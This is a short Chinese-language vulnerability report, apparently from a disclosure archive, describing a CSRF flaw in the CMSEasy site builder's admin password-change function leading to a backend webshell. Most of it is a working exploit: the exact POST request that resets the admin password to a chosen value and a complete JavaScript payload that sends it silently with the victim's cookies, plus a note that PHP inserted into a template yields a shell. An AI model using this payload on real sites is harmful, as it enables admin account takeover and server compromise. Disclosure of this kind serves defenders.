Cmseasy建站系统csrf获取管理权限后台getshell

### 简要描述： Cmseasy建站系统csrf获取管理权限后台getshell ### 详细说明： 在修改管理密码处存在csrf漏洞 http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default post: onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4 可通过csrf修改管理密码： ``` function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; }var _x = ajax(); postgo(); function postgo() { src="http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default"; data="onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4" xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); cookie = document.cookie; if(_m=="POST"){ _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.setRequestHeader("Cookie",cookie); } _x.send(_a); return _x.responseText; } ``` 后台编辑模板 插入php代码可getshell ### 漏洞证明： [<img src="https://images.seebug.org/upload/201408/071655212230bde338ce0e10c040a13194325114.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/071655212230bde338ce0e10c040a13194325114.jpg) [<img src="https://images.seebug.org/upload/201408/07165534389772af43d107660645d01df58e5090.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/07165534389772af43d107660645d01df58e5090.jpg)